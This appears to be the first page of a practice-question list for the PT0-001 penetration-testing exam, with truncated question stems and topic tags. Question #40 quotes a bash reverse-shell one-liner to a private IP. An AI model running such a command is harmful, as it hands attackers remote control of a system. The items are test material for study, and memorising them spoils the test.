PT0-001 Practice Questions
248 real PT0-001 exam questions with expert-verified answers and explanations. Page 1 of 5.
- Question #1: Post-exploitation and lateral movement
  A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
  Tags: Windows persistence, registry, schtasks, post-exploitation

- Question #2: Engagement management
  A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
  Tags: wireless testing, scoping, engagement planning, ESSID

- Question #3: Vulnerability discovery and analysis
  Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nucle...
  Tags: ICS security, OT security, industrial control systems, security weaknesses

- Question #4: Vulnerability discovery and analysis
  A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a...
  Tags: CVSS scoring, exploit difficulty, vulnerability assessment, risk scoring

- Question #5: Post-exploitation and lateral movement
  A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regai...
  Tags: Windows persistence, registry run key, services persistence, post-exploitation

- Question #6: Attacks and exploits
  Which of the following tools is used to perform a credential brute force attack?
  Tags: credential brute force, Hydra, password attacks, authentication attacks

- Question #7: Engagement management
  Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
  Tags: engagement communication, rules of engagement, incident escalation, scope management

- Question #8: Vulnerability discovery and analysis
  A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not...
  Tags: vulnerability prioritization, risk management, remediation planning, critical vulnerabilities

- Question #9: Post-exploitation and lateral movement
  Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
  Tags: Linux persistence, chkconfig, service management, cleanup

- Question #10: Attacks and exploits
  A penetration tester wants to target the NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
  Tags: NETBIOS, Responder, LLMNR poisoning, name service attacks

- Question #11: Engagement management
  A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the...
  Tags: rules of engagement, scope documentation, engagement planning, pentest scope

- Question #12: Post-exploitation and lateral movement
  A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
  Tags: insecure file permissions, local privilege escalation, Linux security, file system

- Question #13: Vulnerability discovery and analysis
  A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
  Tags: stored XSS, web application security, vulnerability prioritization, OWASP

- Question #14: Vulnerability discovery and analysis
  A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the...
  Tags: attack surface reduction, service hardening, port security, remediation recommendations

- Question #15: Attacks and exploits
  A penetration tester was able to enter an SQL injection command into a text box and gain access to the information stored on the database. Which of the following is the BEST recomme...
  Tags: SQL injection, web application security, input validation, remediation

- Question #16: Engagement management
  Black box penetration testing strategy provides the tester with:
  Tags: black box testing, penetration testing methodology, engagement scope, testing approaches

- Question #17: Reconnaissance and enumeration
  Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO.)
  Tags: OSINT, Shodan, Maltego, open source intelligence

- Question #18: Attacks and exploits
  A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
  Tags: ARP spoofing, man-in-the-middle, network attacks, gateway spoofing

- Question #19: Post-exploitation and lateral movement
  A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies wou...
  Tags: lateral movement, mitigation strategies, MFA, privilege management

- Question #20: Attacks and exploits
  A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
  Tags: pass the hash, credential attacks, lateral movement, Windows authentication

- Question #21: Attacks and exploits
  A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168....
  Tags: ARP spoofing, MITM attack, arpspoof, network layer attacks

- Question #22: Engagement management
  A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwilling...
  Tags: IPS whitelisting, engagement scope, compliance testing, penetration test planning

- Question #23: Engagement management
  An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a c...
  Tags: ICS security, OT assessment, operational technology, safety considerations

- Question #24: Vulnerability discovery and analysis
  A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following cond...
  Tags: HIPAA compliance, PHI protection, DAR encryption, data in transit

- Question #25: Attacks and exploits
  Which of the following is an example of a spear phishing attack?
  Tags: spear phishing, social engineering, smishing, targeted attacks

- Question #26: Vulnerability discovery and analysis
  A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test th...
  Tags: XML parsing, SOAP messages, web application testing, input validation

- Question #28: Attacks and exploits
  During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetra...
  Tags: reverse shell, netcat, command injection, web application exploitation

- Question #29: Vulnerability discovery and analysis
  Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
  Tags: IoT security, hardware constraints, security by design, embedded systems

- Question #30: Attacks and exploits
  Which of the following commands starts the Metasploit database?
  Tags: Metasploit, msfconsole, exploitation framework, database initialization

- Question #31: Vulnerability discovery and analysis
  A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. Th...
  Tags: Android security, APK analysis, SAST, mobile application testing

- Question #32: Vulnerability discovery and analysis
  A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results a...
  Tags: vulnerability scanning, web server configuration, information disclosure, attack prioritization

- Question #33: Engagement management
  A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetrati...
  Tags: penetration test report, executive summary, risk reporting, report structure

- Question #34: Reconnaissance and enumeration
  A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and ou...
  Tags: web application testing, hidden fields, black box testing, HTTP reconnaissance

- Question #35: Post-exploitation and lateral movement
  A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10...
  Tags: X11 forwarding, SSH tunneling, remote GUI access, lateral movement

- Question #36: Attacks and exploits
  A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given th...
  Tags: forced browsing, authorization bypass, access control, web application security

- Question #37: Post-exploitation and lateral movement
  A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim bac...
  Tags: reverse shell, bash TCP redirect, port 443, firewall evasion

- Question #38: Attacks and exploits
  A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration...
  Tags: Content Security Policy, clickjacking, web security headers, missing security controls

- Question #39: Engagement management
  Which of the following are MOST important when planning for an engagement? (Select TWO.)
  Tags: engagement planning, impact tolerance, scope definition, company policies

- Question #40: Post-exploitation and lateral movement
  The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0>&1 Which of the following describe...
  Tags: bash reverse shell, TCP redirect, command analysis, TTY redirection

- Question #41: Attacks and exploits
  Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?
  Tags: physical security, lock bypass, under-the-door tool, physical intrusion

- Question #42: Engagement management
  During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
  Tags: client communication, critical findings, incident handling, scope management

- Question #43: Attacks and exploits
  A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the vic...
  Tags: evil twin, HTTP downgrade, SSL stripping, wireless attack

- Question #44: Post-exploitation and lateral movement
  After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled "changepass". -sr-xr-x 1 root ro...
  Tags: SUID exploitation, PATH hijacking, privilege escalation, Linux

- Question #45: Reconnaissance and enumeration
  A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
  Tags: DNS enumeration, PTR records, reverse DNS, scripting

- Question #46: Vulnerability discovery and analysis
  Given the following Python script: Which of the following is where the output will go?
  Tags: Python scripting, output redirection, code analysis

- Question #47: Vulnerability discovery and analysis
  An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of e...
  Tags: HTTP methods, credential exposure, GET vs POST, web security

- Question #48: Vulnerability discovery and analysis
  A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
  Tags: static analysis, SAST, code review, vulnerability scanning

- Question #49: Attacks and exploits
  While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: Which of the following remediation steps should be taken to prevent this type...
  Tags: open redirect, WAF, URL redirection, web vulnerabilities

- Question #50: Vulnerability discovery and analysis
  A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration te...
  Tags: discovery scan, compliance scanning, software baseline, network scanning

- Question #51: Engagement management
  A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over...
  Tags: phishing remediation, password policy, VPN cipher suite, security awareness